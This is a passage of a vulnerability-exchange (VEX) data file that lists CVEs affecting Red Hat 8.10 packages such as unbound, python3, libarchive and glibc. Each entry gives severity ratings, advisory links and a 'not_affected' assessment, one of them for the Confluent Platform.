          "url": "https://nlnetlabs.nl/news/2026/May/20/unbound-1.25.1-released/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42960"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8282-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42960"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42960.txt"
        }
      ],
      "published": "2026-05-20T10:16:28+00:00",
      "updated": "2026-07-24T10:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4360",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        281
      ],
      "description": "In the Tarfile.extract() function, the filter parameter is not passed properly when extracting hardlinks. An affected system that extracts content from untrusted tar files could end up writing files with an unexpected uid/gid despite the user passing filter='data' to the extract() function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4360"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4360"
        },
        {
          "url": "https://github.com/python/cpython/commit/0367912be336348b30572f8029cec4a282782d92"
        },
        {
          "url": "https://github.com/python/cpython/commit/5e0ef3f1afe892e4f64eb83368db57ac4c40cba0"
        },
        {
          "url": "https://github.com/python/cpython/commit/7b57e8d51446297b8c7c482d224bc5f1938e4301"
        },
        {
          "url": "https://github.com/python/cpython/commit/7ccdbaba2c54250a70d7f25632152df7655a5e0a"
        },
        {
          "url": "https://github.com/python/cpython/commit/cf23b9153181062150d061468b6d24af33fe214f"
        },
        {
          "url": "https://github.com/python/cpython/commit/d2b2f5eacab4dd48446b63340613b05dcbbf0b44"
        },
        {
          "url": "https://github.com/python/cpython/commit/eee3ddf0ca10283cc7fea724aae9cd8665f8d15e"
        },
        {
          "url": "https://github.com/python/cpython/issues/151987"
        },
        {
          "url": "https://github.com/python/cpython/pull/151988"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/TWZW2PC2AZOV6FENIHFSRC63OM7MBGSB/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4360"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4360"
        }
      ],
      "published": "2026-06-30T15:16:57+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4426",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1335
      ],
      "description": "A flaw was found in libarchive. An Undefined Behavior vulnerability exists in the zisofs decompression logic, caused by improper validation of a field (`pz_log2_bs`) read from ISO9660 Rock Ridge extensions. A remote attacker can exploit this by supplying a specially crafted ISO file. This can lead to incorrect memory allocation and potential application crashes, resulting in a denial-of-service (DoS) condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4426"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:8944"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4426"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449010"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2897"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4426"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8292-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4426"
        }
      ],
      "published": "2026-03-19T15:16:28+00:00",
      "updated": "2026-06-17T10:56:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4437",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C Library version 2.34 to version 2.43 could, with a crafted response from the configured DNS server, result in a violation of the DNS specification that causes the application to treat a non-answer section of the DNS response as a valid answer.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4437"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19061"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20597"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4437"
        },
        {
          "url": "https://bugzilla.redhat.com/2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453117"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4046"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4437"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4438"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19061.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20597"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4437.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-500006.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4437"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34014"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8611-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4437"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/03/23/2"
        }
      ],
      "published": "2026-03-20T20:16:49+00:00",
      "updated": "2026-07-14T13:18:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.28-251.el8_10.40?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.28-251.el8_10.40",
              "status": "affected"
            }
          ]
        },
        {
